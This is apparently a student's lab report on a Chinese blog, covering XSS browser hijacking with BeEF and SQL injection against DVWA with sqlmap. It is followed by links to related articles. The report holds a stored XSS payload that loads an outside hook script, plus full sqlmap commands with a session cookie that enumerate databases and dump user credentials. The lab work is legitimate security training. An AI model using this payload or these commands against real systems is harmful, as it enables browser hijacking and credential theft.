实验三 XSS和SQL注入

最新推荐文章于 2023-04-18 12:17:22 发布
最新推荐文章于 2023-04-18 12:17:22 发布
阅读量102 收藏
点赞数
文章标签: xss sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62111722/article/details/127986483
版权

实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);

被攻击者:访问留言簿网站,浏览器被劫持。

1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。

 

2、Kali使用beef生成恶意代码,截图。

 

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

<script src="http://(kali的ip):3000/hook.js"></script>,截图。

 

4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。

 

劫持前

 

劫持后

 

5、回答问题:实验中XSS攻击属于哪种类型?

本次实验中的XSS攻击属于存储型。

SQL注入部分:DVWA+SQLmap+Mysql注入实战

实验环境搭建。启动Metasploitable2虚拟机。

1、注入点发现。首先肯定是要判断是否有注入漏洞。

在输入框输入1,结果如下

ID: 1

First name: admin

Surname: admin

返回正常;

再次输入1',报错,返回

 

此时可以断定有SQL注入漏洞,

http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#

下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;

2、枚举当前使用的数据库名称和用户名。

输入的命令:

sqlmap -u "http://192.168.244.97/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=4d6e6c04ea4fe6c579ce4d4b32209277' -b --current-db --current-user                                                                       

Sqlmap输出截图。

 

Ps:URL那块在存储栏可以找到,如下图

 

3、枚举数据库用户名和密码

你输入的命令:

 sqlmap -u "http://192.168.244.97/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=4d6e6c04ea4fe6c579ce4d4b32209277' --users --password                                                             

Sqlmap输出截图。

 

4、枚举数据库

--dbs:枚举当前数据库

你输入的命令:

sqlmap -u "http://192.168.244.97/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=4d6e6c04ea4fe6c579ce4d4b32209277' --dbs                                                                        

Sqlmap输出截图。

5、枚举数据库和指定数据库的数据表

 -D 数据库名:指定数据库

--tables:枚举指定数据库的所有表

你输入的命令:

sqlmap -u "http://192.168.244.97/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=4d6e6c04ea4fe6c579ce4d4b32209277' -D "dvwa" --tables                                                                       

Sqlmap输出截图。

 

6、获取指定数据库和表中所有列的信息

-D:指定的数据库

-T:指定数据库中的数据表

--columns:获取列的信息

你输入的命令:

sqlmap -u "http://192.168.244.97/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=4d6e6c04ea4fe6c579ce4d4b32209277' -D "dvwa" -T users --columns                                                                         

Sqlmap输出截图。

7、枚举指定数据表中的所有用户名与密码,并down到本地。

-C:枚举数据表中的列

--dump:存储数据表项

你输入的命令:

sqlmap -u "http://192.168.244.97/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=4d6e6c04ea4fe6c579ce4d4b32209277' -D "dvwa" -T users -C “user_id,user,password” --dump                                                                        

Sqlmap输出截图。

 

查看down到本地的用户名与密码,截图。(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。)

 

实验小结

XSS实验中,环境准备即搭建留言薄网站花了挺多时间,也请教了几个舍友才弄懂。Kali下载beef也出现了蛮多错误,后来上网百度终于解决了。

SQL注入实验中,需要输入的指令很多很长,一不小心就会弄错,需要仔细输入。

总之,学习就是不断纠正错误的过程,向大佬请教,向老师请教,自己查阅网上资料,都是在学习知识。

Open丶Road
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络渗透测试实验三
qq_27846373的博客
12-09 2976
一、跨站攻击 内容:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。 角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建) 攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站); 被攻击者:访问留言簿网站,浏览器被劫持。 前期准备,用Windows server 2003搭建网站,这个就不展开讲了,不是实验重点。 1.利用AWVS扫描留言簿网站,发现存在xss漏洞 2.kali使用beef生成恶意代码 ...
2020-12-01
weixin_52121537的博客
12-01 146
XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。 角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建) 攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站); 被攻击者:访问留言簿网站,浏览器被劫持。 1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。 2、Kali使用beef生成恶意代码,截图。 3、访问http://留言簿网站/message.asp;将以下恶意代码写入
【白帽子学习笔记】XSSSQL注入
python_LC_nohtyp的博客
11-17 1562
【白帽子学习笔记】XSSSQL注入 yysy姚总布置的实验报告越来越难写了,菜菜的我要写好久,┭┮﹏┭┮ 文章目录【白帽子学习笔记】XSSSQL注入0x01 实验知识点1x01 什么是XSS?1x02 什么是Cookie?1x03 XSS漏洞的分类1x04 SQL注入攻击0x02 XSS部分:Beef1x01 搭建GuestBook网站1x02 AWVS扫描1x03 Kail中使用Beef生成恶意代码1x04 XSS注入漏洞2x01 XSS劫持网站2x02 劫持浏览器指定被劫持网站为学校主
网络渗透测试实验一
kistch的博客
11-21 3632
实验目的: 理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等 实验步骤: 1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。 2、手机位置定位。
网络渗透测试 XSSSQL注入
12-02
【网络渗透测试 XSSSQL注入】的实验旨在深入理解网络安全中的两种常见攻击手法,并学习如何防范。XSS(跨站脚本攻击)和SQL注入都是针对Web应用的安全威胁,主要利用了程序处理用户输入的疏忽。 XSS攻击是攻击者...
软件安全实验2 SQL注入实验
最新发布
06-19
分别是Brute Force(暴力破解)、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的验证码)、SQL Injection(SQL注入)...
适用于asp.net以及IIS服务器测试的网站源码(含有xss以及sql注入漏洞)
05-25
【标题】"适用于asp.net以及IIS服务器测试的网站源码(含有xss以及sql注入漏洞)" 提供了一个用于网络安全实践和IIS服务器配置验证的环境。这个资源包含了一个带有XSS(跨站脚本攻击)和SQL注入漏洞的ASP.NET网站源...
PHP开发漏洞环境(SQL注入+文件上传+文件下载+XSS+万能密码+session/cookie+购物逻辑漏洞的学习等等)
05-08
这个PHP开发漏洞环境提供了学习和实践多种常见安全问题的机会,如SQL注入、文件上传、文件下载、跨站脚本(XSS)、弱口令、Session/Cookie管理以及购物逻辑漏洞等。下面将对这些知识点进行详细的阐述。 1. SQL注入:...
面向SQL注入XSS攻击的Web入侵检测系统的设计 论文.docx
06-19
### 面向SQL注入XSS攻击的Web入侵检测系统设计 #### 摘要解读与背景 随着互联网技术的飞速发展及其在日常生活中的广泛应用,网络安全问题日益凸显,尤其是针对Web应用的安全威胁,已经成为了学术界和产业界的...
网络扫描与网络侦察
weixin_47046535的博客
11-06 499
网络扫描与网络侦察 实验目的:理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等 实验步骤: 1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。
【网络安全知识体系】外网渗透测试 | 14个小实验
热门推荐
04-18 1万+
【通俗易懂】外网渗透测试的流程&14个小实验带你了解网络安全
网络渗透测试学习二之网络嗅探与身份认证
Force~
11-08 509
文章目录一、实验目的二、实验工具三、使用步骤1、网络嗅探部分2.读入数据总结 一、实验目的 1、通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协议的数据结构、通过实验了解HTTP等协议明文传输的特性。 2、研究交换环境下的网络嗅探实现及防范方法,研究并利用ARP协议的安全漏洞,通过Arpspoof实现ARP欺骗以捕获内网其他用户数据。 3、能利用BrupSuite实现网站登录暴力破解获得登录密码。 4、能实现ZIP密
渗透测试实验一 网络扫描与网络侦察
qq_50798384的博客
11-06 1031
一. 用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。 二、照片中的女生在哪里旅行?截图搜索到的地址信息 1.首先,再搜索引擎中输入图片中的关键信息cafe brasserie letrentehuit 2.找到店的门牌号为38 avenue de Suffren,75015 Paris, ,France,发现这家店位于巴黎 3.在谷歌地球中输入门牌号,即得到街景信息 4.在百度地图中输入门牌号38 avenue d
实验一
m0_51315528的博客
11-04 312
实验一 网络扫描与网络侦察 实验步骤: 1-5题为被动扫描,利用搜索引擎或相关网站 1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。 2、照片中的女生在哪里旅行? 截图搜索到的地址信息。 3、手机位置定位。通过LAC(Location Area Code,位置区域码)和CID(Cell Identity,基站编号,是个16位的数据(范围是0到65535)可以查询手机接入的基站的位置,从而初步确定手机用户的位置。 获取
渗透测试入门11之一次完整的渗透测试实验
鹿鸣天涯
04-04 1356
渗透测试的一般思路: 侦查,信息收集,漏洞扫描,漏洞利用,提升权限,保持连接 本次实验只用到信息收集,漏洞扫描及漏洞利用 攻击机:Kali2.0 64位(192.168.41.131) 目标机:Win7 64位(192.168.41.137) 本次实验用到的知识: Nmap: -A详细扫描操作系统指纹识别和版本检测 -sSSYN扫描(半连接扫描) -sT全...
[网安实践III] 实验1.渗透测试实验
LostUnravel的博客
11-09 5968
网安实践III - 实验1.渗透测试1 你的攻击机IP和靶机IP2 同组同学的姓名,同组同学的靶机msfadmin的密码,root的密码3 你是如何发现漏洞的?请写出发现漏洞的过程4 攻击利用的漏洞,以及攻击的过程。(写到如何获得shadow文件即可)5 获得靶机的shadow文件中msfadmin账号和root账号的内容6 靶机的msfadmin用户的密码,以及破解过程msfadmin密码破解过程7 靶机的root密码,以及破解过程root密码破解过程8 攻击流量包提交 1 你的攻击机IP和靶机IP 攻
网络渗透测试
m0_65456462的博客
03-22 1399
主机信息收集技术—基础知识 黑客攻击的一般过程: 1.主机信息收集技术—Nmap (1)信息收集主要收集目标主机的相关信息,主要包括端口、服务、漏洞等信息。信息收集手段多样,可借助工具也多种多样。 端口扫描:Nmap。 (2) Nmap的基本Nmap+ ip6+ ip Nmap -A开启操作系统识别和版本识别功能 –T(0-6档)设置扫描的速度一般设置T4过快容易被发现-v显示信息的级别,-vv显示更详细的信息 192.168.1.1/24扫描C段 192.168.11-254=上 .
网络渗透测试实验:XSS攻击和SQL注入防御
本实验旨在让学生了解网络渗透的基本概念和技术,包括XSS攻击和SQL注入攻击的原理、防御方法和实践操作。实验环境使用Kali Linux 2和Windows Server,网络环境采用交换网络结构,实验工具包括Beef、AWVS、SqlMAP和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值